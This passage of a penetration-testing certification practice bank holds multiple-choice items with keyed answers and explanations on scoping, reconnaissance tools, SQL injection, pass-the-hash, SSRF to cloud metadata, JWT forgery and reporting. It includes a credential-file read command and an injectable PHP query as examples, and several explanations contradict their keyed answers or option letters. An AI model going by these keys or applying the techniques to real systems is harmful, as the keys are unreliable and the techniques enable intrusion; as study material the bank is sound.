D.To automatically detect SQL injection vulnerabilities
AnswerB

Mitmproxy allows the tester to view and alter requests/responses, useful for testing input validation and logic flaws.

Why this answer

The mitmproxy library is specifically designed for man-in-the-middle interception and modification of HTTP/HTTPS traffic. By setting up a proxy and modifying requests in real time, the script's most likely purpose is to intercept and manipulate API requests for security testing, such as fuzzing parameters, injecting payloads, or bypassing client-side controls.

Exam trap

The trap here is that candidates often confuse mitmproxy with passive sniffing tools like Wireshark, failing to recognize that mitmproxy's core feature is active interception and modification of application-layer traffic, not just passive observation or raw packet capture.

How to eliminate wrong answers

Option A is wrong because passive network mapping and port scanning rely on tools like Nmap or Wireshark to observe traffic without modification, whereas mitmproxy actively intercepts and alters traffic, which is not passive. Option C is wrong because capturing raw network packets for offline analysis is the function of packet sniffers like tcpdump or Wireshark, which operate at the network layer (Layer 3) and do not modify requests; mitmproxy works at the application layer (Layer 7) and is designed for real-time manipulation, not offline capture.

863
MCQhard

During a code review of a PHP web application, you encounter the following code: $result = mysql_query("SELECT * FROM users WHERE username='" . $_GET['user'] . "'");. Which vulnerability does this represent?

A.Cross-site scripting (XSS)
B.Path traversal
C.Command injection
D.SQL injection
AnswerD

Correct: unsanitized input in SQL query leads to injection.

Why this answer

Direct concatenation of user input into SQL query without sanitization or parameterization is classic SQL injection.

864
MCQhard

A penetration tester is scoping a test for a client that uses a SaaS application for customer relationship management. The client wants the tester to assess the application's security. What is the most important consideration regarding this SaaS application?

A.The application is hosted on the cloud, so it is automatically in scope
B.The tester should obtain explicit permission from the SaaS provider before testing
C.The tester should only test the client's configuration of the SaaS application
D.The tester can test the application as long as the client provides administrative credentials
AnswerB

Correct. Testing a third-party SaaS requires provider authorization.

Why this answer

The tester must ensure that the SaaS provider's terms of service allow security testing and that permission is obtained.

865
Matchingmedium

Match each network protocol to its well-known port number.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

22

443

53

25

3389

Why these pairings

These are standard well-known port assignments for common protocols used in penetration testing.

866
MCQmedium

A penetration tester is writing a Bash script to automate enumeration of a Linux system after gaining a shell. The script needs to extract user information from the /etc/passwd file. Which command would be most efficient for listing only the usernames?

A.cat /etc/passwd | cut -d: -f1
B.cat /etc/passwd | awk '{print $1}'
C.cat /etc/passwd | head
D.grep 'user' /etc/passwd
AnswerA

This correctly splits each line by colon and outputs the first field (username).

Why this answer

Option A is correct because the `cut` command with `-d: -f1` splits each line of /etc/passwd on the colon delimiter and extracts the first field, which is the username. This is the most efficient and purpose-built approach for parsing colon-delimited files in Linux, avoiding unnecessary overhead from other tools.

Exam trap

The trap here is that candidates often assume `awk` with default field splitting works for colon-delimited files, but they forget to specify the `-F:` flag, leading to incorrect output that includes the entire line or unexpected fields.

How to eliminate wrong answers

Option B is wrong because `awk '{print $1}'` defaults to whitespace field splitting, but /etc/passwd uses colons as delimiters, so it would print the entire line (since the line has no spaces before the first colon) rather than just the username. Option C is wrong because `head` outputs the first 10 lines of the file by default, not just usernames, and does not parse or extract specific fields at all.

867
MCQeasy

A penetration tester is performing passive reconnaissance and wants to identify subdomains associated with a target domain without directly querying the target's DNS servers. Which tool is specifically designed for this purpose?

A.WPScan
B.Nmap
C.theHarvester
D.Gobuster
AnswerC

theHarvester collects emails, subdomains, and other data from public sources, suitable for passive reconnaissance.

Why this answer

TheHarvester is specifically designed for passive reconnaissance, gathering subdomains from public sources like search engines (Google, Bing), PGP key servers, and the Shodan database without querying the target's DNS servers directly. This aligns with the requirement to avoid direct interaction with the target's infrastructure, making it the correct choice for passive subdomain enumeration.

Exam trap

The trap here is that candidates often confuse passive reconnaissance with tools that can perform subdomain enumeration but require active DNS queries, such as Gobuster or Nmap's dns-brute script, leading them to overlook theHarvester's passive data collection from public sources.

How to eliminate wrong answers

Option A is wrong because WPScan is a WordPress vulnerability scanner that actively probes the target web server, not a passive reconnaissance tool for subdomain discovery. Option B is wrong because Nmap is an active network scanner that sends packets to target hosts, directly querying DNS servers if used with scripts like dns-brute, which violates the passive requirement. Option D is wrong because Gobuster performs active brute-force enumeration of subdomains by sending DNS queries to the target's DNS servers, making it an active technique, not passive.

868
MCQhard

A penetration tester is analyzing a Python script that performs a buffer overflow attack. The script imports the struct module and the socket module. It constructs a payload by packing a pattern of characters, then overwriting a return address with a specific offset. Which of the following is the most critical piece of information the tester must determine before running this script against the target?

A.The IP address and port of the target service
B.The exact location of a JMP ESP instruction in memory
C.The version of the operating system running on the target
D.The username and password for the target service
AnswerB

For a buffer overflow where the shellcode is placed in the stack, overwriting the return address with the address of a JMP ESP instruction (which must be at a fixed, predictable address) will redirect execution to the shellcode. Determining this address is crucial for a reliable exploit.

Why this answer

The script performs a buffer overflow attack by overwriting a return address. To redirect execution to attacker-controlled shellcode, the tester must overwrite the return address with the address of a JMP ESP instruction (or equivalent) that is reliably located in memory. Without this address, the overwritten return pointer will cause a crash or unpredictable behavior, making exploitation impossible.

Exam trap

The trap here is that candidates often focus on network connectivity (IP/port) or OS version, overlooking that the core technical challenge in a buffer overflow exploit is controlling execution flow via a reliable return address like JMP ESP.

How to eliminate wrong answers

Option A is wrong because while the IP address and port are necessary to connect to the target service, they are not the most critical piece of information for the exploitation phase; the script already imports socket and presumably has connection details. Option C is wrong because the OS version can help in selecting appropriate offsets or shellcode, but the immediate critical requirement is the address of a JMP ESP instruction, which depends on the specific executable or loaded DLL, not just the OS version.

869
MCQeasy

A penetration tester is asked to perform a test that focuses on identifying vulnerabilities in a company's external web application without providing any internal credentials. The tester has been given a signed agreement that lists the IP range and URLs. Which of the following scoping considerations is MOST directly addressed by the agreement?

A.Type of testing (black box vs white box)
B.Time constraints for the test
C.Rules of engagement regarding social engineering
D.Data handling procedures
AnswerA

Correct. The lack of internal credentials and the external IP/URL scope clearly indicate a black box test, which is a primary scoping consideration.

Why this answer

The signed agreement explicitly defines the IP range and URLs for testing, which directly informs the type of testing. Since no internal credentials are provided, this is a black box test, where the tester has no prior knowledge of the internal system. The agreement's scope (IPs and URLs) is the primary factor that determines the testing approach, making 'Type of testing (black box vs white box)' the most directly addressed scoping consideration.

Exam trap

The trap here is that candidates may confuse the provision of an IP range and URL list with a 'white box' scenario, but the lack of internal credentials and the signed agreement's focus on external targets clearly define it as a black box test, not a white box test.

How to eliminate wrong answers

Option B is wrong because time constraints, while important in scoping, are not directly addressed by an agreement that only lists IP ranges and URLs; time constraints would be specified in a separate section of the rules of engagement or project timeline. Option C is wrong because rules of engagement regarding social engineering are not implied by the provision of an IP range and URL list; social engineering rules require explicit consent and separate authorization, and the absence of internal credentials does not automatically permit social engineering.

870
Multi-Selectmedium

A penetration tester is preparing to present findings to the client's technical team. Which TWO practices are most effective for this audience?

Select 2 answers
A.Focus on the return on investment for fixing vulnerabilities.
B.Use analogies to explain vulnerabilities in everyday terms.
C.Include proof-of-concept code and remediation commands.
D.Explain the technical details of each vulnerability, including exploit steps.
E.Provide high-level business impact summaries only.
AnswersC, D

This provides actionable information for the technical team.

Why this answer

Technical audiences benefit from detailed explanations and evidence, including proof-of-concept code and remediation steps.

871
MCQmedium

A penetration tester is finalizing a report for a client. The client's technical team needs a concise list of each vulnerability with its risk rating, CVSS score, and recommended remediation steps. In which section of the report should this information be placed?

A.Findings and technical details
B.Executive summary
C.Scope and methodology
D.Appendix
AnswerA

This section is designed to present each vulnerability with its risk rating, CVSS score, impact, and remediation.

Why this answer

The Findings and technical details section is the correct placement because it is specifically designed to provide a detailed, itemized list of vulnerabilities, including risk ratings, CVSS scores, and remediation steps, which the client's technical team needs for action. This section goes beyond high-level summaries to deliver the granular data required for patching and mitigation, aligning with the PT0-002 objective of structuring reports for different audiences.

Exam trap

The trap here is that candidates confuse the Executive summary's role for technical audiences, but the PT0-002 exam emphasizes that technical details belong in the Findings section, while the Executive summary is for non-technical decision-makers.

How to eliminate wrong answers

Option B is wrong because the Executive summary is intended for non-technical stakeholders (e.g., management) and provides a high-level overview of risks, business impact, and strategic recommendations, not a concise list of each vulnerability with CVSS scores and remediation steps. Option C is wrong because the Scope and methodology section describes the testing boundaries, tools used, and techniques employed (e.g., Nmap scans, exploitation frameworks), not the detailed findings or remediation guidance.

872
MCQeasy

A client is planning a penetration test of their AWS cloud environment. They will provide the tester with an IAM user account with limited permissions. Which of the following scoping restrictions is most important to include in the rules of engagement to avoid unexpected costs?

A.The tester must not create any new AWS resources that incur costs.
B.The tester must use only premium AWS services for testing.
C.The tester must request permission from AWS Support before each test.
D.The tester must avoid testing in the us-east-1 region due to higher costs.
AnswerA

This restriction prevents the tester from accidentally or intentionally launching billable resources. It is a standard and critical control for cloud penetration tests.

Why this answer

Option A is correct because creating new AWS resources (e.g., EC2 instances, RDS databases, Lambda functions) can incur direct costs under the tester's IAM user account, even with limited permissions. The rules of engagement must explicitly prohibit resource creation to prevent unexpected billing, as AWS charges for resources provisioned regardless of the test's purpose. This scoping restriction aligns with the principle of cost containment in penetration testing engagements.

Exam trap

The trap here is that candidates may focus on technical restrictions like service tiers or support permissions, overlooking the direct financial risk of resource creation, which is the most critical scoping concern in cloud penetration testing.

How to eliminate wrong answers

Option B is wrong because requiring the use of only premium AWS services would increase costs unnecessarily and contradicts the goal of avoiding unexpected expenses; premium services are more expensive and not required for effective testing. Option C is wrong because requesting permission from AWS Support before each test is impractical and not a standard scoping restriction; AWS Support does not authorize individual penetration tests, and the tester should rely on the client's authorization and the AWS Acceptable Use Policy.

873
MCQmedium

During a web application penetration test, the tester wants to identify the technologies used by the target website. Which of the following tools is best suited for technology fingerprinting?

A.Nikto
B.Nmap
C.Gobuster
D.WhatWeb
AnswerD

WhatWeb is a tool specifically designed for website fingerprinting to identify technologies.

Why this answer

Wappalyzer is a browser extension and online tool that identifies web technologies such as frameworks, CMS, and server software.

874
Multi-Selectmedium

After completing a penetration test, the tester must handle test artifacts appropriately. Which TWO of the following are best practices for data handling and destruction?

Select 2 answers
A.Securely delete all test data after the engagement is complete
B.Return any client data to the client before destruction
C.Keep all test data indefinitely for future reference
D.Store test data in an unencrypted archive on the tester's laptop
E.Share test data with other clients for benchmarking
AnswersA, B

Correct. Data should be securely destroyed.

Why this answer

Best practices include securely erasing test data and returning any client data to the client.

875
MCQeasy

A penetration tester is preparing the final report. The client's CEO needs to understand the overall risk level and the business impact of the findings. Which of the following should be included in the executive summary?

A.A detailed list of all vulnerabilities with CVSS scores
B.The exact commands and payloads used during exploitation
C.A quantitative risk analysis including annualized loss expectancy
D.A high-level summary of the test's scope, overall risk rating, and business impact
AnswerD

This is exactly what the executive summary is designed for: giving non-technical leaders a clear picture of the risk without overwhelming them with technical details.

Why this answer

The executive summary is designed for senior management, such as the CEO, who needs a concise overview of the penetration test's scope, overall risk rating, and business impact to make informed decisions. Detailed technical data, such as CVSS scores or exploitation commands, is inappropriate for this audience and belongs in the technical report. Option D directly addresses the requirement for a high-level, business-focused summary.

Exam trap

The trap here is that candidates often confuse the executive summary with the technical report, mistakenly thinking that including detailed CVSS scores or exploitation commands demonstrates thoroughness, when in fact the exam expects a clear separation of audience-specific content.

How to eliminate wrong answers

Option A is wrong because a detailed list of all vulnerabilities with CVSS scores is too granular for an executive summary; CVSS scores are technical metrics that require context and are better placed in the technical findings section. Option B is wrong because exact commands and payloads used during exploitation are operational details intended for the technical team, not for a CEO who needs business impact analysis. Option C is wrong because while quantitative risk analysis (e.g., ALE) can be useful, it is not always feasible or required in a penetration test report; the executive summary should focus on qualitative risk ratings and business impact, not specific financial calculations that may rely on assumptions not validated by the test.

876
MCQhard

A penetration tester has compromised a Linux server and wants to move laterally to a Windows server. The Linux server has network access to the Windows server on port 445. The tester has a captured NTLM hash of a domain administrator account. Which technique is most likely to allow the tester to authenticate and execute commands on the Windows server?

A.Pass-the-hash using Impacket's psexec
B.Kerberos Golden Ticket attack
C.SMB relay attack using the hash
D.Brute-force password cracking of the hash
AnswerA

Pass-the-hash allows authentication using the NTLM hash directly, enabling lateral movement to Windows systems.

Why this answer

Option A is correct because the tester has a captured NTLM hash of a domain administrator account and network access to the Windows server on port 445 (SMB). Pass-the-hash (PtH) allows authentication using the NTLM hash directly without needing the plaintext password. Impacket's psexec uses the SMB protocol to authenticate with the hash and execute commands remotely, making it the most direct and effective technique for lateral movement in this scenario.

Exam trap

The trap here is that candidates may confuse pass-the-hash with SMB relay, but relay requires intercepting a live authentication attempt, whereas pass-the-hash directly uses the captured hash to authenticate without any relay.

How to eliminate wrong answers

Option B is wrong because a Kerberos Golden Ticket attack requires forging a Ticket Granting Ticket (TGT) using the KRBTGT account's hash, which is not captured here; the captured hash is for a domain administrator account, not the KRBTGT account, and the attack also requires domain controller access, not just SMB to a Windows server. Option C is wrong because an SMB relay attack requires the tester to intercept and relay authentication attempts from a client to a server, but the tester already possesses the hash and does not need to relay it; relay attacks are used when the hash cannot be directly used (e.g., with NTLMv2 and no local admin rights), but here the hash is directly usable for pass-the-hash.

877
MCQmedium

A penetration tester is performing service enumeration on a discovered host and wants to grab banners from open ports to identify the exact software and version running. Which of the following command-line tools would be most appropriate for this task?

A.traceroute target.com
B.ping target.com
C.curl http://target.com
D.nc -v target.com 22
AnswerD

Netcat connects to port 22 and will display the SSH banner.

Why this answer

Option D is correct because `nc -v target.com 22` uses Netcat in verbose mode to connect to port 22 on the target, which triggers the SSH server to send its banner (e.g., "SSH-2.0-OpenSSH_8.9p1"). This banner directly reveals the exact software and version running on that port, making it ideal for service enumeration and banner grabbing.

Exam trap

Cisco often tests the distinction between general connectivity tools (ping, traceroute) and service-specific tools (nc, telnet, nmap -sV), expecting candidates to recognize that only raw TCP connection tools can perform banner grabbing on arbitrary ports.

How to eliminate wrong answers

Option A is wrong because `traceroute` is used to map the network path (hops) between the source and destination, not to connect to open ports or retrieve banners. Option B is wrong because `ping` uses ICMP Echo Requests to test host reachability and does not interact with TCP/UDP services to grab banners. Option C is wrong because `curl http://target.com` sends an HTTP request and retrieves the web page content, but it does not perform raw TCP banner grabbing on arbitrary ports (e.g., SSH on port 22) and may not reveal the exact software version unless the server leaks it in HTTP headers.

878
Multi-Selectmedium

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

Select 2 answers
A.Accessing the AWS metadata endpoint at 169.254.169.254
B.Scanning internal IP addresses and ports
C.Crafting a JavaScript payload for XSS
D.Injecting SQL queries into the URL
E.Forcing the server to send a POST request
AnswersA, B

This is a classic SSRF target.

Why this answer

SSRF can access internal services like cloud metadata endpoints and perform internal port scans.

879
MCQeasy

A penetration tester needs to automate a series of web application attacks against a login page to identify weak credentials. Which tool is most appropriate?

A.Nmap
B.Hydra
C.Burp Suite
D.Wireshark
AnswerB

Hydra is a network logon cracker that supports multiple protocols for brute-forcing credentials.

Why this answer

Option A is correct because Hydra is a tool designed for brute-force attacks on login pages. Option B is wrong because Nmap is for network discovery. Option C is wrong because Wireshark is for packet capture.

Option D is wrong because Burp Suite is for web application testing but not primarily for brute-forcing credentials.

880
MCQhard

After completing a penetration test, the client's technical team requests the detailed raw data (e.g., scan results, exploit logs, packet captures) used to support the findings. According to best practices, which of the following should the penetration tester do?

A.Include all raw data in the appendices of the final report
B.Provide the raw data in a separate, sanitized deliverable with a data handling agreement
C.Refuse to provide raw data to protect the confidentiality of the testing process
D.Provide the raw data only if the client signs a non-disclosure agreement
AnswerB

This approach protects confidentiality and allows the client to use the data responsibly.

Why this answer

Option B is correct because raw data such as scan results, exploit logs, and packet captures often contain sensitive information like IP addresses, credentials, or system details. Best practices (e.g., PTES, NIST SP 800-115) dictate that raw data should be provided in a separate, sanitized deliverable accompanied by a data handling agreement to ensure confidentiality and proper data governance, rather than embedding it directly in the final report.

Exam trap

The trap here is that candidates may assume the final report should include all evidence for completeness (Option A), overlooking the confidentiality and data handling risks inherent in raw, unsanitized data.

How to eliminate wrong answers

Option A is wrong because including all raw data in the appendices of the final report risks exposing sensitive information to unauthorized readers and violates data minimization principles; the final report should contain only synthesized findings and evidence. Option C is wrong because refusing to provide raw data outright is not a best practice—clients have a legitimate need for supporting evidence, and a professional tester should provide it under controlled conditions with a data handling agreement.

881
MCQhard

A penetration tester is conducting a wireless penetration test. The client's rules of engagement state that testing must not disrupt production services. During the test, the tester's de-authentication attack causes the company's guest Wi-Fi to go offline. What should the tester do?

A.Ignore the issue and complete the test
B.Reduce the intensity of the attack
C.Continue testing because guest Wi-Fi is not critical
D.Stop testing and follow the emergency stop procedure
AnswerD

The tester must halt and notify the client.

Why this answer

According to the RoE, the tester must stop testing if there is an emergency or disruption. The tester should follow the emergency stop procedure and contact the client.

882
MCQhard

During a penetration test, a tester exploits a buffer overflow vulnerability in a legacy application. After gaining code execution, what is the next best step to maintain access?

A.Create a backdoor user account
B.Install an antivirus solution
C.Patch the buffer overflow vulnerability
D.Erase the application logs
AnswerA

A backdoor account provides reliable access even if the exploit is patched.

Why this answer

After gaining code execution via a buffer overflow, the next best step is to create a backdoor user account to maintain persistent access to the compromised system. This ensures the tester can re-enter the environment without re-exploiting the vulnerability, which may be patched or monitored. Creating a local user account (e.g., via `net user` or `useradd`) is a standard persistence technique in penetration testing, allowing continued access for lateral movement or data exfiltration.

Exam trap

CompTIA often tests the distinction between maintaining access (persistence) and covering tracks (log deletion) or remediation (patching), leading candidates to mistakenly choose log erasure or patching as the immediate next step after exploitation.

How to eliminate wrong answers

Option B is wrong because installing an antivirus solution would likely detect and remove the tester's tools or backdoors, undermining the goal of maintaining access; it also violates the tester's objective of stealth. Option C is wrong because patching the buffer overflow vulnerability would fix the exploited flaw, but this is a remediation step for the client, not a step to maintain the tester's access; it would actually prevent future exploitation. Option D is wrong because erasing application logs may help cover tracks, but it does not provide a mechanism for re-entry; log deletion is a post-exploitation cleanup step, not a persistence method.

883
Multi-Selectmedium

A penetration tester discovers a vulnerability that cannot be immediately remediated. Which TWO compensating controls should the tester recommend? (Choose TWO.)

Select 2 answers
A.Disable the affected service entirely.
B.Ignore the vulnerability until the next patch cycle.
C.Implement network segmentation to limit exposure.
D.Add an intrusion detection system (IDS) to monitor for exploitation.
E.Upgrade the software immediately.
AnswersC, D

Segmentation reduces the attack surface.

Why this answer

Network segmentation (C) is a compensating control that limits the blast radius by isolating the vulnerable system from critical assets, reducing the likelihood of lateral movement. An IDS (D) provides detection and alerting for exploitation attempts, enabling a rapid response even when the root vulnerability cannot be patched immediately. Both controls reduce risk without requiring an immediate fix.

Exam trap

The trap here is that candidates often confuse compensating controls with remediation actions, selecting 'upgrade the software immediately' (E) even though the scenario explicitly states the vulnerability cannot be immediately remediated.

884
MCQmedium

A penetration tester is reviewing a Python script that uses the `requests` library to send HTTP POST requests to a login endpoint. The script attempts to bypass authentication by sending SQL injection payloads in the username field. Which of the following code changes would MOST effectively help the tester identify successful injections by reducing false negatives?

A.Using a `requests.Session` object to maintain cookies across requests
B.Parsing the response for specific error messages such as 'SQL syntax' or 'mysql_fetch_array'
C.Implementing a random delay between requests to avoid rate limiting
D.Adding a function to automatically resend each payload multiple times
AnswerB

This allows the script to confirm that the injection payload was processed by the database, reducing false negatives.

Why this answer

Option B is correct because parsing the HTTP response for database-specific error messages (e.g., 'SQL syntax', 'mysql_fetch_array') directly indicates that the SQL injection payload triggered a detectable database error, confirming a successful injection. This reduces false negatives by catching cases where the login fails but the injection still executes, rather than relying solely on authentication bypass (which may not occur if the injection is blind or the query structure differs).

Exam trap

The trap here is that candidates often confuse session management (Option A) or evasion techniques (Option C) with detection logic, overlooking that the core goal is to reduce false negatives by explicitly checking for injection success indicators in the response.

How to eliminate wrong answers

Option A is wrong because using a `requests.Session` object maintains cookies and session state across requests, which is useful for session handling but does not help identify whether a SQL injection payload succeeded; it addresses session continuity, not detection of injection success. Option C is wrong because implementing a random delay between requests helps avoid rate limiting or WAF detection, but it does not improve the accuracy of identifying successful injections; it only evades defenses, not reduces false negatives in detection.

885
MCQmedium

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

A.CrackMapExec
B.evil-winrm
C.wmiexec
D.psexec
AnswerC

wmiexec uses WMI (Windows Management Instrumentation) for remote command execution.

Why this answer

wmiexec (part of Impacket) allows execution of commands on a Windows host via WMI using valid credentials, suitable for lateral movement.

886
MCQhard

A penetration tester is performing web application reconnaissance and wants to discover API endpoints and hidden parameters that may not be linked from the main application. Which technique would be most effective for this purpose?

A.Running Nikto for web server vulnerabilities
B.JavaScript analysis for endpoint discovery
C.Directory bruteforcing with gobuster
D.Using Wappalyzer to fingerprint technologies
AnswerB

JavaScript files often contain API endpoints, routes, and parameters.

Why this answer

JavaScript analysis often reveals AJAX API endpoints, keys, and parameters that are not visible in HTML. Directory bruteforcing may find endpoints but JS analysis is more targeted for hidden APIs.

887
MCQmedium

A penetration tester runs a SYN scan against a target and receives SYN-ACK responses from several ports. The tester then runs version detection on those ports. What is the primary purpose of version detection?

A.To identify the operating system of the target
B.To perform a vulnerability scan
C.To determine if the host is online
D.To identify the software and version running on open ports
AnswerD

Version detection probes open ports to determine the application name and version, aiding vulnerability assessment.

Why this answer

Version detection (-sV) in Nmap identifies the specific software and version running on open ports, helping assess potential vulnerabilities and plan further exploitation.

888
MCQmedium

A penetration tester is using Nmap to scan a target web server. The tester only wants to see which of the top 100 ports are open, but wants to minimize network traffic and time. Which Nmap command is most appropriate?

A.nmap -sS -p- target
B.nmap -sT -p 1-100 target
C.nmap -sC -p 1-1000 target
D.nmap -sV --top-ports 100 target
AnswerD

--top-ports 100 scans the most frequently open ports, minimizing traffic and time while focusing on likely candidates.

Why this answer

Option D is correct because `--top-ports 100` instructs Nmap to scan only the 100 most commonly open ports, which minimizes network traffic and time compared to scanning all ports or a large range. The `-sV` flag enables version detection, which is not strictly required but is commonly used in information gathering; however, the key factor for minimizing traffic and time is the `--top-ports` option, which uses a statistically derived list to reduce scan scope.

Exam trap

The trap here is that candidates confuse `-p 1-100` (first 100 ports numerically) with `--top-ports 100` (most commonly open ports), leading them to choose option B, which misses high-numbered common ports like 443 (HTTPS) or 8080 (HTTP-alt).

How to eliminate wrong answers

Option A is wrong because `-p-` scans all 65535 ports, which generates maximum traffic and takes the longest time, contradicting the goal of minimizing both. Option B is wrong because `-sT` performs a full TCP connect scan, which is slower and more detectable than a SYN scan, and `-p 1-100` scans only the first 100 ports numerically, not the top 100 most common ports, potentially missing open ports like 443 or 8080. Option C is wrong because `-sC` runs default NSE scripts, which adds significant traffic and time, and `-p 1-1000` scans 1000 ports, far more than the requested top 100, increasing scan duration.

889
MCQmedium

A penetration tester discovers a Java application that deserializes user-controlled data without validation. The tester crafts a malicious serialized object that executes a command upon deserialization. The application runs on a Linux server with a standard Java runtime. Which of the following is the most likely outcome if the malicious object is accepted?

A.The application will crash immediately due to an exception.
B.The application will disclose sensitive information in the response.
C.The tester will gain a shell with the privileges of the current user.
D.The tester will be able to execute arbitrary commands on the server.
AnswerD

Successful exploitation of insecure deserialization in Java often results in remote code execution.

Why this answer

Java deserialization of untrusted data allows an attacker to supply a crafted serialized object that, when deserialized, can execute arbitrary code via gadget chains (e.g., CommonsCollections). Since the application runs on a Linux server with a standard Java runtime, the attacker can achieve remote code execution (RCE) with the privileges of the application's user, not necessarily an interactive shell. Option D is correct because the primary impact is arbitrary command execution, which may or may not yield a shell depending on the payload.

Exam trap

The trap here is that candidates often conflate 'arbitrary command execution' with 'gaining a shell' (Option C), but the exam expects the broader, more precise impact—arbitrary command execution—since a shell is just one specific form of command execution and not guaranteed by every payload.

How to eliminate wrong answers

Option A is wrong because while deserialization can throw exceptions, a crafted malicious object is designed to execute code before or instead of throwing an unhandled exception, so a crash is not the most likely outcome. Option B is wrong because deserialization RCE does not inherently disclose sensitive information in the response; information disclosure would require a specific payload or secondary vulnerability. Option C is wrong because gaining a shell is a possible outcome of arbitrary command execution, but it is not guaranteed; the most direct and accurate description is arbitrary command execution, as the payload may execute a command without spawning an interactive shell.

890
MCQeasy

During the reconnaissance phase, a penetration tester wants to map out the target's DNS infrastructure without directly interacting with the target's servers. Which of the following techniques BEST achieves this?

A.Performing a DNS zone transfer
B.Querying publicly available DNS records
C.Using Nmap to scan for DNS servers
D.Sending crafted DNS queries to the target's DNS server
AnswerB

Using public DNS resolvers to retrieve records like A, MX, or CNAME is passive and avoids direct interaction.

Why this answer

Option B is correct because querying publicly available DNS records (e.g., via passive DNS, WHOIS, or DNS dumpster) allows the tester to gather DNS information without any direct interaction with the target's servers. This technique relies on third-party databases and cached records, avoiding any packets sent to the target, which is essential for stealth during reconnaissance. It aligns with passive information gathering, as defined in the PT0-002 objectives.

Exam trap

The trap here is that candidates often confuse 'passive reconnaissance' with 'active reconnaissance' and choose a technique like DNS zone transfer or Nmap scanning, which are clearly active and detectable, because they assume any DNS enumeration must involve direct queries.

How to eliminate wrong answers

Option A is wrong because a DNS zone transfer is an active query that directly interacts with the target's authoritative DNS server, requiring the server to allow AXFR requests, which is a direct interaction and not passive. Option C is wrong because using Nmap to scan for DNS servers involves sending packets to the target's network to probe for open ports (e.g., UDP 53), which is active reconnaissance and directly interacts with the target's infrastructure.

891
MCQmedium

A penetration tester is testing a web application that uses JSON Web Tokens (JWTs) for authentication. The tester discovers that the server does not verify the JWT signature properly. The tester crafts a JWT with an arbitrary payload and sets the algorithm to 'none'. Which attack does this enable?

A.SQL injection
B.Server-side request forgery
C.Authentication bypass
D.Cross-site request forgery
AnswerC

Setting the algorithm to 'none' and forging the token allows the attacker to bypass authentication and gain unauthorized access.

Why this answer

Option C is correct because setting the JWT algorithm to 'none' removes all cryptographic verification. If the server does not validate the signature, it will accept a token with an arbitrary payload, allowing the attacker to impersonate any user without knowing the secret key. This directly results in an authentication bypass, as the server trusts the forged token.

Exam trap

The trap here is that candidates may confuse JWT algorithm manipulation with injection attacks (SQLi) or server-side request forgery (SSRF), but the core of this question is about signature verification failure leading to authentication bypass.

How to eliminate wrong answers

Option A is wrong because SQL injection targets database queries via input fields, not JWT token manipulation; the 'none' algorithm attack does not involve injecting SQL commands. Option B is wrong because server-side request forgery (SSRF) exploits server-side requests to internal resources, whereas this attack modifies the JWT itself to bypass authentication, not to trigger outbound requests.

892
MCQmedium

Which legal framework in the United States makes it a crime to access a computer system without authorization, and is a key consideration when obtaining permission for penetration testing?

A.SOX
B.HIPAA
C.GDPR
D.CFAA
AnswerD

Correct. The CFAA prohibits unauthorized access.

Why this answer

The Computer Fraud and Abuse Act (CFAA) is the primary US law against unauthorized access.

893
Multi-Selectmedium

A penetration tester is conducting an external assessment of a target organization and wants to gather information without sending any packets that might be logged by the target's network monitoring systems. Which TWO of the following methods are considered passive reconnaissance?

Select 2 answers
A.Send spear-phishing emails to employees
B.Query the target's DNS servers using nslookup
C.Use Shodan to identify exposed services
D.Conduct WHOIS lookups on the target's domain
E.Perform a full port scan using Nmap
AnswersC, D

Shodan crawls the internet and stores publicly available information, so queries against Shodan are passive.

Why this answer

Passive reconnaissance involves collecting information from publicly available sources without directly interacting with the target's systems. WHOIS lookups and Shodan searches both rely on public databases and do not send probes to the target network. DNS queries (option D) can be logged by the target's DNS servers and are therefore active.

Port scanning (option A) and phishing emails (option C) are active techniques that directly interact with the target.

894
MCQmedium

A penetration tester is performing passive reconnaissance and wants to find historical versions of the target website, including old pages that may contain sensitive information. Which resource should the tester use?

A.Pastebin
B.Shodan
C.Wayback Machine
D.Google dorks
AnswerC

Wayback Machine archives historical versions of websites.

Why this answer

The Wayback Machine (archive.org) archives historical snapshots of websites. Pastebin is for pasted text, Google dorks are for search queries, and Shodan is for device discovery.

895
Multi-Selecthard

A penetration tester is assessing a web application and wants to discover hidden directories, files, and parameters. Which THREE of the following tools are most appropriate for this task?

Select 3 answers
A.Nikto
B.dirsearch
C.Wappalyzer
D.feroxbuster
E.Gobuster
AnswersB, D, E

Dirsearch is a directory bruteforcing tool.

Why this answer

B (dirsearch) is correct because it is a purpose-built tool for brute-forcing hidden directories and files in web applications using HTTP GET requests and a wordlist. It efficiently discovers unlinked resources that are not exposed via normal navigation, which is critical for information gathering during a penetration test.

Exam trap

The trap here is that candidates confuse vulnerability scanners (Nikto) or technology fingerprinters (Wappalyzer) with directory brute-forcing tools, leading them to select options that serve different phases of the penetration testing methodology.

896
MCQmedium

Which of the following best describes the purpose of a vulnerability disclosure policy in the context of a penetration test?

A.To list the assets that are out of scope
B.To define the rules of engagement for the test
C.To establish a process for reporting discovered vulnerabilities to the client and possibly to the public
D.To provide legal protection to the tester
AnswerC

Correct. It sets expectations for vulnerability handling.

Why this answer

A vulnerability disclosure policy outlines how vulnerabilities found during testing will be reported and remediated.

897
MCQeasy

A penetration tester runs the following command and receives the output. What does this output indicate?

A.The target has three services running
B.The target has a misconfigured SSL certificate
C.The target is using default credentials
D.The target is running a vulnerable version of OpenSSH
AnswerA

The scan shows three open ports (22, 80, 443) with services.

Why this answer

Option B is correct because the output shows three open ports: 22, 80, 443. Option A is wrong because OpenSSH 7.4 is not necessarily vulnerable. Option C is wrong because no credentials are shown.

Option D is wrong because the SSL certificate is not detailed.

898
MCQmedium

A penetration testing firm is contracted to test a cloud-based infrastructure. The client uses a shared responsibility model. Which of the following should be clarified in the rules of engagement to avoid legal issues?

A.Who is responsible for patching the operating system
B.Whether the tester needs authorization from the cloud provider
C.The encryption method for data at rest
D.The backup strategy for logs
AnswerB

Many cloud providers require explicit authorization for penetration testing; failing to obtain it can lead to service termination or legal action.

Why this answer

In a shared responsibility model, the cloud provider is responsible for the security of the cloud, while the customer is responsible for security in the cloud. However, penetration testing activities may violate the cloud provider's terms of service or acceptable use policy, potentially triggering legal action. Therefore, obtaining explicit authorization from the cloud provider is critical to ensure the tester's actions are legally permitted and to avoid liability for unauthorized access under laws like the Computer Fraud and Abuse Act (CFAA).

Exam trap
